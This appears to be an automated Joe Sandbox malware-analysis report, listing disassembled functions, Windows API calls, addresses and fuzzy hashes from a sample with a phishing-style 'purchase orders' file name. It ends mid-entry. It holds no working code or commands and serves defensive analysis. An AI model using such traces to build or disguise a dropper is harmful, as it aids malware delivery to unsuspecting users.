                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeMessageSendUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 2896919175-0
                                                                                              • Opcode ID: 95b7a93c4fc4e873e9bd386357b323479c00034fda28020175f95b5bd0a4bc65
                                                                                              • Instruction ID: 7e99d7d4fb8bb12c566fb67139ae5e5ce66cf86df35e622ac950679830b3b0b7
                                                                                              • Opcode Fuzzy Hash: 95b7a93c4fc4e873e9bd386357b323479c00034fda28020175f95b5bd0a4bc65
                                                                                              • Instruction Fuzzy Hash: CAF0B4765006008BE3416794AD05B977764EFD4314F19407EEF84B62E1DB795C418F5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040156B Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShowWindow.USER32(00010464,?), ref: 0040157F
                                                                                              • ShowWindow.USER32(0001045E), ref: 00401594
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1268545403-0
                                                                                              • Opcode ID: 80c01896ddf0bfd96a5f83b3cdf674c0755e4aa1b1326ce251104d3977c9ad8a
                                                                                              • Instruction ID: 33fc8dbab593221758c929e2c4cf6aa55605c55e9f7a49d44961cb8ca10e987b
                                                                                              • Opcode Fuzzy Hash: 80c01896ddf0bfd96a5f83b3cdf674c0755e4aa1b1326ce251104d3977c9ad8a
                                                                                              • Instruction Fuzzy Hash: 88E08633B041049BCB15CFA8ED808AEB7A6EB88321314047FD502B36A0C679ED40CF28
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040642A Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                                • Part of subcall function 004063BA: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
                                                                                                • Part of subcall function 004063BA: wsprintfW.USER32 ref: 0040640C
                                                                                                • Part of subcall function 004063BA: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406420
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2547128583-0
                                                                                              • Opcode ID: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                                                              • Instruction ID: 08b0c8f2ef2dcefd2b61a20e7fd6ba3d75d00ffdaa245a95e4079d340ab3ded5
                                                                                              • Opcode Fuzzy Hash: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                                                              • Instruction Fuzzy Hash: D2E0863260462056D25197745E4493773AD9E99744302043EFA46F2080DB789C329B6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405C25 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00402E2E,00442800,80000000,00000003,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00405C29
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00405C4B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCreate
                                                                                              • String ID:
                                                                                              • API String ID: 415043291-0
                                                                                              • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                              • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                              • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                              • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405C00 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00405805,?,?,00000000,004059DB,?,?,?,?), ref: 00405C05
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C19
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                              • Instruction ID: cd99531f96ac703a51573f19c9b8cc9de44b2267bcc9c0d579c2fc711e4bd44e
                                                                                              • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                              • Instruction Fuzzy Hash: 3AD0C972504520ABC2102738AE0889BBB55EB952717024B39FAA9A22B0CB304C568A98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004056FB Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405701
                                                                                              • GetLastError.KERNEL32 ref: 0040570F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1375471231-0
                                                                                              • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                              • Instruction ID: e63be1853aafe68c2793134b37a867bebc3d2beebaf226ad42ac31f610d1a78e
                                                                                              • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                              • Instruction Fuzzy Hash: 7CC04C30225602DBDA105B60DE087177A94AB90741F118439A146E21A0DA348415ED2D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401673 Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 0040168E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileMove
                                                                                              • String ID:
                                                                                              • API String ID: 3562171763-0
                                                                                              • Opcode ID: c1911339f88ff2685d8bed33e3940ac637680d1b740950eefc1af9fa259cb3b8
                                                                                              • Instruction ID: a33ea4ce092b273b82d7568f8593bc3c23f19caa72544136df2e5d6ca1611784
                                                                                              • Opcode Fuzzy Hash: c1911339f88ff2685d8bed33e3940ac637680d1b740950eefc1af9fa259cb3b8
                                                                                              • Instruction Fuzzy Hash: 92F0B431605114D7DF10BFBA4F0DD9E32A58BC2338B28427BF911B21D5DAFC8A4196AE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: d9c78980a0f443f5658f5d159ba5a1d01dba279dc715946118e82bdfb2219104
                                                                                              • Instruction ID: ed87ac6fe78c97b3ff6a715646c68139f6b7da630c9be1cec1260a384e7beadd
                                                                                              • Opcode Fuzzy Hash: d9c78980a0f443f5658f5d159ba5a1d01dba279dc715946118e82bdfb2219104
                                                                                              • Instruction Fuzzy Hash: 3AE0E676154108BFDB01DFA5EE47FE977ECAB44704F048035BA08D7091C674F5508768
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405CD7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A00,000000FF,00416A00,000000FF,000000FF,00000004,00000000), ref: 00405CEB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                              • Instruction ID: cd54f3301e23830850d9ea58ef2d9b6b3716dac1cb42590a0fcdec79a0e610d3
                                                                                              • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                              • Instruction Fuzzy Hash: 77E0EC3221425EABDF109E959C04EEB7B6CEB05360F048437FD16E2150D631E921ABA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405CA8 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CBC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                                              • Instruction ID: ab2ba72c7da8d0590a5026c7b9f2a747677d692c160b15db9e96a66b9068c41a
                                                                                              • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                                              • Instruction Fuzzy Hash: 01E0EC3221425AABEF109E659C04EEB7B6CEB15361F104437F915F6150E631E861ABB4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 6ef0c3512c2906a1c08331c62920983107679ca7315389df55633a20f56d33da
                                                                                              • Instruction ID: 76e81b74098be2a3706baaa1e1a2527734eadd1478321fb398c06c814fc07831
                                                                                              • Opcode Fuzzy Hash: 6ef0c3512c2906a1c08331c62920983107679ca7315389df55633a20f56d33da
                                                                                              • Instruction Fuzzy Hash: B5D05E33B05100DBDB10DFE8AE08ADD77B5AB80338B24817BE601F21E4D6B8C6509B1D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404160 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00010458,00000000,00000000,00000000), ref: 00404172
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 13c84271a77af59bb4435d25b14bc6de72d6595d127670e1db8d8b2520383cf4
                                                                                              • Instruction ID: c65f6eba747e04129790f2b1b21bae9375029ebd28d99582ecd6e8b4464eea9f
                                                                                              • Opcode Fuzzy Hash: 13c84271a77af59bb4435d25b14bc6de72d6595d127670e1db8d8b2520383cf4
                                                                                              • Instruction Fuzzy Hash: 56C09B717447007BDA119F609D4DF1777646764702F1544797344F51D0C774D450D61C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404149 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157
                                                                                              Memory Dump Source
